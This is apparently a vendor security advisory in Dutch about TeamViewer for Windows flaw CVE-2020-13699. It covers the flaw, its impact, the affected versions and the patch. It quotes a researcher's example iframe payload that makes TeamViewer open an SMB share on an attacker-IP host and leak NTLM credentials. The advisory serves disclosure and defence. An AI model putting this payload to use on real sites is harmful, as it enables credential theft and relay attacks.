Er is een kwetsbaarheid met hoog risico aangetroffen in TeamViewer voor Windows. Het gaat om “CVE-2020-13699”, met een CVSS basisscore van “8.8”. Aanvallers op afstand kunnen deze kwetsbaarheid misbruiken om het wachtwoord van gebruikers te kraken, wat kan leiden tot verdere systeemuitbuiting.

TeamViewer is een softwaretoepassing voor het op afstand bedienen, delen van desktops, onlinevergaderingen, webvergaderingen en bestandsoverdracht tussen computers, ontwikkeld door het Duitse bedrijf TeamViewer GmbH. TeamViewer is beschikbaar voor Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, en BlackBerry besturingssystemen. Het is ook mogelijk om met een webbrowser toegang te krijgen tot een systeem waarop TeamViewer draait.

Een recente toename in het gebruik van softwareapplicaties voor verbindingen op afstand is te wijten aan de recente verschuiving in de COVID-19 Pandemie van de thuiswerkcultuur.

(CVE-2020-13699) Details van de kwetsbaarheid:

• CVE-2020-13699 is een beveiligingslek dat voortkomt uit een niet-gequoteerd zoekpad of -element. Meer specifiek is deze kwetsbaarheid te wijten aan het feit dat de toepassing haar aangepaste URI-handlers niet correct citeert.

• Een gebruiker met een geïnstalleerde kwetsbare TeamViewer-versie wordt misleid tot het bezoeken van een kwaadaardig gemaakte website om misbruik te maken van deze kwetsbaarheid.

• Volgens Jeffrey Hofmann, een beveiligingsingenieur bij Praetorian, die de kwetsbaarheid ontdekte en openbaar maakte, “kan een aanvaller een kwaadaardig iframe insluiten in een website met een bewerkte URL (iframe src=’teamviewer10: -play \attacker-IP\share.tvs’) die de TeamViewer Windows desktop client start en deze dwingt om een remote SMB share te openen.”
• Windows voert NTLM authenticatie uit bij het openen van de SMB share. Dat verzoek kan worden doorgestuurd, d.w.z. een aanvaller kan een authenticatie vastleggen en naar een andere server sturen, waardoor ze de mogelijkheid krijgen om operaties uit te voeren op de remote server met de privilege van de geauthenticeerde gebruiker.
• Succesvolle exploitatie van deze kwetsbaarheid zou een externe aanvaller in staat kunnen stellen om TeamViewer te starten met arbitraire parameters. De applicatie zou gedwongen kunnen worden om een NTLM authenticatieverzoek door te sturen naar het systeem van de aanvaller, waardoor offline rainbow table aanvallen en pogingen tot brute kracht kraken mogelijk worden.

• Deze aanvallen zouden kunnen leiden tot extra uitbuiting door gestolen referenties als gevolg van de succesvolle uitbuiting van de kwetsbaarheid.

De openbaarmaking suggereerde dat er geen aanwijzingen zijn dat deze kwetsbaarheid is uitgebuit.

Volgens CIS is het risico op uitbuiting groot voor overheidsinstellingen en middelgrote bedrijven. Voor kleine bedrijven is het risico gemiddeld en voor thuisgebruikers laag.

Impact
De uitbuiting van de kwetsbaarheden zou aanvallers op afstand in staat kunnen stellen om gevoelige informatie over credentials te verkrijgen of de volledige controle over het getroffen systeem over te nemen.

Betrokken producten
TeamViewer Windows Desktop Application voorafgaand aan 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, en 15.8.3.

Oplossing
TeamViewer heeft een beveiligingsupdate gepubliceerd die CVE-2020-13699 aanpakt.

SanerNow beveiligingsinhoud om deze kwetsbaarheid op te sporen en te verhelpen is gepubliceerd. We raden ten zeerste aan de beveiligingsupdate toe te passen met onze gepubliceerde instructies voor ondersteuningsartikelen.